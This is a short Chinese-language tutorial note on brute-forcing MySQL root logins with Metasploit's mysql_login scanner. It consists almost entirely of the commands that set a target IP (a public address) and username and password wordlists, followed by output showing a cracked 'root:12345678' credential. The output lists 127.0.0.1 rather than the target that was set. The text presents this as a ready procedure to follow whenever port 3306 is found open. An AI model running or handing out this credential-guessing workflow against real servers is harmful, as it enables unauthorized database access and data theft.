-
nmap扫出3306端口的话,就往下;
-
搜索漏洞
msf > search mysql_login
- 使用该漏洞
msf > use auxiliary/scanner/mysql/mysql_login
- 查看该漏洞用法
msf auxiliary(mysql_login) > show options
- 向rhosts输入ip,看到可以正常访问mysql
msf auxiliary(mysql_login) > set rhosts 121.42.27.192
- 找一个测试爆破的用户名字典和密码字典进行爆破
msf auxiliary(mysql_login) > set user_file /usr/share/metasploit-framework/data/wordlists/unix_users.txt
msf auxiliary(mysql_login) > set pass_file /usr/share/sparta/wordlists/mysql-default-userpass.txt
- run
msf auxiliary(mysql_login) > run
# 运行可以查看到mysql版本为 MySQL version 5.7.29
[+] 127.0.0.1:3306 - 127.0.0.1:3306 - Found remote MySQL version 5.7.29
[-] 127.0.0.1:3306 - 127.0.0.1:3306 - LOGIN FAILED: root: (Incorrect: Access denied for user 'root'@'localhost' (using password: NO))
......
[-] 127.0.0.1:3306 - 127.0.0.1:3306 - LOGIN FAILED: root:111 (Incorrect: Access denied for user 'root'@'localhost' (using password: YES))
[+] 127.0.0.1:3306 - 127.0.0.1:3306 - Success: 'root:12345678'
[*] 127.0.0.1:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
# 看到绿色加号[+] 即为破解成功!